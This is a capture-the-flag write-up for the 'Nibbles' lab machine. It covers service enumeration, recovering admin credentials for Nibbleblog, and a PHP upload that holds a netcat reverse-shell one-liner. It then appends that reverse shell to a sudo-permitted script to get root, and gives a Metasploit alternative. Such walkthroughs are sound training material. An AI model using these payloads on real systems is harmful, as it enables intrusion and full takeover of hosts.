Nibbles

External Enumeration

Nmap

nmap -sV –open -oA nibbles_initial_scan 10.129.200.170

nmap -sV –script=http-enum -oA nibbles_nmap_http_enum 10.129.200.170

Banners

nc -nv 10.129.200.170 22
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2

nc -nv 10.129.200.170 80
(UNKNOWN) [10.129.200.170] 80 (http) open

whatweb 10.129.200.170
http://10.129.200.170 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170]

HTTP (80)

Curl

curl http://10.129.200.170
<b>Hello world!</b>
<!– /nibbleblog/ directory. Nothing interesting here! –>

Directory

gobuster dir -u http://10.129.200.170/nibbleblog/ –wordlist /usr/share/dirb/wordlists/common.txt -t 60

/.hta (Status: 403) [Size: 304]
/.htaccess (Status: 403) [Size: 309]
/admin (Status: 301) [Size: 327] [–> http://10.129.200.170/nibbleblog/admin/\\]
/admin.php (Status: 200) [Size: 1401]
/.htpasswd (Status: 403) [Size: 309]
/content (Status: 301) [Size: 329] [–> http://10.129.200.170/nibbleblog/content/\\]
/index.php (Status: 200) [Size: 2987]
/languages (Status: 301) [Size: 331] [–> http://10.129.200.170/nibbleblog/languages/\\]
/plugins (Status: 301) [Size: 329] [–> http://10.129.200.170/nibbleblog/plugins/\\]
/README (Status: 200) [Size: 4628]
/themes (Status: 301) [Size: 328] [–> http://10.129.200.170/nibbleblog/themes/\\]

Checking ReadMe File

curl http://10.129.200.170/nibbleblog/README

Version: v4.0.3
  • This version may be vulnerable
curl -s http://10.129.200.170/nibbleblog/content/private/users.xml | xmllint –format -
<?xml version=“1.0” encoding=“UTF-8” standalone=“yes”?>
<users>
<user username=“admin”>
<id type=“integer”>0</id>
<session_fail_count type=“integer”>0</session_fail_count>
<session_date type=“integer”>1514544131</session_date>
</user>
<blacklist type=“string” ip=“10.10.10.1”>
<date type=“integer”>1512964659</date>
<fail_count type=“integer”>1</fail_count>
</blacklist>
</users>
  • This gives us username=admin
curl -s http://10.129.200.170/nibbleblog/content/private/config.xml | xmllint –format -
<?xml version=“1.0” encoding=“utf-8” standalone=“yes”?>
<config>
<name type=“string”>Nibbles</name>
<slogan type=“string”>Yum yum</slogan>
<footer type=“string”>Powered by Nibbleblog</footer>
<advanced_post_options type=“integer”>0</advanced_post_options>
<url type=“string”>http://10.10.10.134/nibbleblog/</url>
<path type=“string”>/nibbleblog/</path>
<items_rss type=“integer”>4</items_rss>
<items_page type=“integer”>6</items_page>
<language type=“string”>en_US</language>
<timezone type=“string”>UTC</timezone>
<timestamp_format type=“string”>%d %B, %Y</timestamp_format>
<locale type=“string”>en_US</locale>
<img_resize type=“integer”>1</img_resize>
<img_resize_width type=“integer”>1000</img_resize_width>
<img_resize_height type=“integer”>600</img_resize_height>
<img_resize_quality type=“integer”>100</img_resize_quality>
<img_resize_option type=“string”>auto</img_resize_option>
<img_thumbnail type=“integer”>1</img_thumbnail>
<img_thumbnail_width type=“integer”>190</img_thumbnail_width>
<img_thumbnail_height type=“integer”>190</img_thumbnail_height>
<img_thumbnail_quality type=“integer”>100</img_thumbnail_quality>
<img_thumbnail_option type=“string”>landscape</img_thumbnail_option>
<theme type=“string”>simpler</theme>
<notification_comments type=“integer”>1</notification_comments>
<notification_session_fail type=“integer”>0</notification_session_fail>
<notification_session_start type=“integer”>0</notification_session_start>
<notification_email_to type=“string”>admin@nibbles.com</notification_email_to>
<notification_email_from type=“string”>noreply@10.10.10.134</notification_email_from>
<seo_site_title type=“string”>Nibbles - Yum yum</seo_site_title>
<seo_site_description type=“string”/>
<seo_keywords type=“string”/>
<seo_robots type=“string”/>
<seo_google_code type=“string”/>
<seo_bing_code type=“string”/>
<seo_author type=“string”/>
<friendly_urls type=“integer”>0</friendly_urls>
<default_homepage type=“integer”>0</default_homepage>
</config>
  • Nibbles appears frequently in the config, may be password
  • Password = nibbles

Gain initial foothold into system

http://10.129.200.170/nibbleblog/admin.php → plugins → configure “My Image”

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f"); ?>
  • upload image.php
  • Run the image.php
nc -nvlp 4444
curl <http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
cat user.txt

Escalate Privileges

unzip personal.zip
cat monitor.sh
python3 -m http.server
wget http://<ip>:8000/LinEnum.sh
./LinEnum.sh

[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4445 >/tmp/f' | tee -a monitor.sh appended to monitor.sh

nc -nvlp 4445

sudo /home/nibbler/personal/stuff/monitor.sh
cat root.txt

Alt Method

msfconsole
search nibbleblog
use 0
show options
set username admin
set password nibbles
set targeturi nibbleblog
set payload generic/shell_reverse_tcp
exploit